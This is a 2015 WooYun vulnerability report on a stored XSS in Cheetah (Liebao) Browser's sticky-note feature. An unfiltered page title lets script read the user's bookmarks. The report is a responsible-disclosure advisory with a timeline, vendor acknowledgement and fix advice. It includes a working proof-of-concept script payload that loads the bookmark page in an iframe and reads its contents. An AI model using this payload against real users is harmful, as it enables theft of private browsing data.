当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0112810

漏洞标题:猎豹浏览器某处设计存在问题导致可以读取用户收藏夹(有条件)

相关厂商:金山软件集团

漏洞作者: wutongyu

提交时间:2015-05-08 11:11

修复时间:2015-08-06 13:20

公开时间:2015-08-06 13:20

漏洞类型:远程代码执行

危害等级:中

自评Rank:6

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-05-08: 细节已通知厂商并且等待厂商处理中
2015-05-08: 厂商已经确认,细节仅向厂商公开
2015-05-11: 细节向第三方安全合作伙伴开放
2015-07-02: 细节向核心白帽子及相关领域专家公开
2015-07-12: 细节向普通白帽子公开
2015-07-22: 细节向实习白帽子公开
2015-08-06: 细节向公众公开

简要描述:

连5分都不给我,好坏的!

详细说明:

之前测试了2次在线收藏,如今你们2处都已经修复。
最近在反复测试你们功能,发现有一个猎豹随手贴,即:

12345.jpg


他其实就是记录了:

42.jpg

常用的右击行为。
保存之后回显出来的地方,依然对title没有过滤。导致了xss的产生,因为此处涉及到浏览器用户的敏感信息,此处的xss即可以读取收藏夹,也可以读取随手贴的内容。

漏洞证明:

构造<title><script>alert(location.href)</script>
当用户保存随手贴之后:

1234.jpg


这样我们很容易从之前的案例代码copy一份出来。但是实际测试发现会提示innerHTML未定义,反复测试之后是还未加载完执行报的错。使用setInterval()即可成功执行我们的代码。
读取用户收藏poc:
<title><script>
var s=document.createElement("iframe");s.src="http://i.liebao.cn/bookmark/";s.onload=setInterval(function(){alert(s.contentWindow.document.getElementsByTagName("ul")[2].innerHTML)},2000);document.body.appendChild(s);</script></title>
打开之后2秒执行,也可以把数值设小,设置1000都可以。
用户收藏wutongyu.info/bb.htm。下次打开随手贴:

654.jpg


随手贴的内容也可以获取,这里不给出poc了。厂商自己修复吧。

修复方案:

过滤此处输出在title的内容。

版权声明:转载请注明来源 wutongyu@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:3

确认时间:2015-05-08 13:18

厂商回复:

多谢反馈,感谢!

最新状态:

暂无